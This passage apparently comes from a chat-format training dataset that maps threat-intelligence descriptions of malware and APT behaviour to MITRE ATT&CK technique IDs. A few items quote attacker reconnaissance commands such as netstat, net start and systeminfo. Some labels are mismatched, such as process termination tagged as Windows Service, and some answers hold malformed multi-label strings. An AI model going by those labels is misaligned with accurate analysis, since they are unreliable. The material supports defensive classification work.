- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from the ‘aclmain.sdb’ file and performs process hollowing against this instance of msiexec.exe prior to resuming the process"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In mid-2018, OceanLotus carried out a campaign using documents abusing the weakness exposed by the CVE-2017-11882 vulnerability. One of the malicious documents used by OceanLotus was analysed by 360 Threat Intelligence Center (in Chinese) and includes details about the exploit. Let’s take a look at a similar document"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to get text of the current foreground window."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can send collected data in JSON format to C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex has encrypted traffic with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Targets are approached with spearphishing emails that contain a link to a ZIP file hosted on Google Drive. That archive contains several LNK (aka shortcut) files that extract and execute a malicious JavaScript component, while displaying a decoy document"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can scan for removable media which may contain documents for collection."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Receive a file path from the C2 for a file to read. The target file is read and then split into smaller files named \"<target_filename>.part_<part_number>\" and stored on disk. This capability can be used to break large files of interest into smaller chunks to prepare them for exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can identify administrator accounts on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mythic can leverage a peer-to-peer C2 profile between agents."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first action performed by the crypter code is to check some specific registry key. If the key is not detected, the crypter will enter an infinite loop or exit, thus it is used as an anti-analysis technique"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex has used \".cmd\" scripts on the victim's system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used \"netstat -ano | findstr EST\" to discover network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Returns the screenshot to the C2 via: 
111 startTakeScreenShot Creates a thread to take a screenshot at a set interval (default: every 10 seconds)"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has compromised domains to use for C2."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can terminate a specific process by its process id."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a built-in module for port scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon has used the Windows Crypto API to generate an AES key."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task/Job to execute the malware."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa has executed a malicious executable by naming it svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes functions using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Microsoft utility to list processes running on systems."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The decrypted result is saved as “%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe” (T1001) 6) If the file size of “%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe” exceeds 4,485 bytes, it is executed"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Other functionalities provided by this section of the PowerShell Script are as follows: Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username All of this data is concatenated and formatted as shown in Figure 13: Figure 13: Concatenated and formatted data retrieved by PowerShell script Register the victim’s machine to the C2 server by sending the REGISTER command to the server"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can dump credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit reflectively loads a Windows PE file into a process."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Network Reconnaissance – gathering information from machines on the network. Credential Theft – stealing user names and passwords, potentially to provide them with further access to the victim network. RAR archiving – files are transferred to staging servers before exfiltration. Csvde – can be used to extract Active Directory files and data. WMIExec – can be used for lateral movement and to execute commands remotely. PowerShell - a powerful interactive command-line interface and scripting environment included in the Windows operating system"
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet uses HTTP to communicate with a command and control server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang performs service discovery using \"net start\" commands."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OLDBAIT collects credentials from several email clients."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mori can read data from the Registry including from `HKLM\\Software\\NFC\\IPA` and\n`HKLM\\Software\\NFC\\`."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. In addition to acting as a web shell, the malware captures and DES-encrypts credentials before writing the username and password to disk. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon uses the command \"net time \\\\127.0.0.1\" to get information the system’s time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002"
- },
- {
- "role": "assistant",
- "content": "T1588.004 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve can use HTTPS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After initial installation, Raindrop runs a computation to delay execution."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BendyBear can query the host's Registry key at \"HKEY_CURRENT_USER\\Console\\QuickEdit\" to retrieve data."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1053 - Scheduled Task/Job', 'T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has used \"net.exe user\" and \"net.exe users\" to enumerate local accounts on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques"
- },
- {
- "role": "assistant",
- "content": "T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "at can be used to schedule a task on a system to be executed at a specific date or time."
- },
- {
- "role": "assistant",
- "content": "T1053.002 - Scheduled Task/Job: At"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has sent malicious files requiring direct victim interaction to execute."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic uses the \"rem reg query\" command to obtain values from Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One archive sample analyzed by CTU researchers contained a legitimate PDF file, a benign image of interest to targets (see Figure 8), and an HttpBrowser installer disguised as an image file"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 staged data and files in password-protected archives on a victim's OWA server."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has used PsExec to stop services prior to the execution of ransomware."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can gather the user accounts within domain groups."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT-C-36 has used port 4050 for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The VBScript also uploads the output of the provided batch scripts to the command and control (C2) server, which provides threat actors a functional remote shell to the system"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stores information gathered from the endpoint in a file named 1.hwp."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "launches a script to delete their original decoy file to cover tracks."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used the following command following exploitation of a machine with malware to obtain information about services: net start >> %temp%\\download"
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker variants used the Windows AUTORUN feature to spread through USB propagation."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The phishing messages were found to contain a Microsoft Word document attachment that uses VBA macros to install LookBack malware. When the attachment is executed, the malicious VBA macro within the Microsoft Word attachment drops three Privacy Enhanced Mail (PEM) files to the host: tempgup.txt, tempgup2.txt, and tempsodom.txt. Additionally, the file Temptcm.tmp, which is a version of certutil.exe, is dropped to decode the PEM files using Temptcm.tmp. The macro next creates a copy of the decoded PEM files restoring their proper file extensions with the Windows essentuti.exe. Finally, the macro launches GUP.exe and the libcurl.dll loader separately, resulting in the execution of LookBack malware"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "System info: Computer name System info using: cmd /c systeminfo >%temp%\\temp.ini List of currently running process using: cmd /c tasklist >%temp%\\temp.ini Exfiltration The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern: From (- --).txt"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1074 - Data Staged', 'T1057 - Process Discovery', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to obtain screenshots of the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
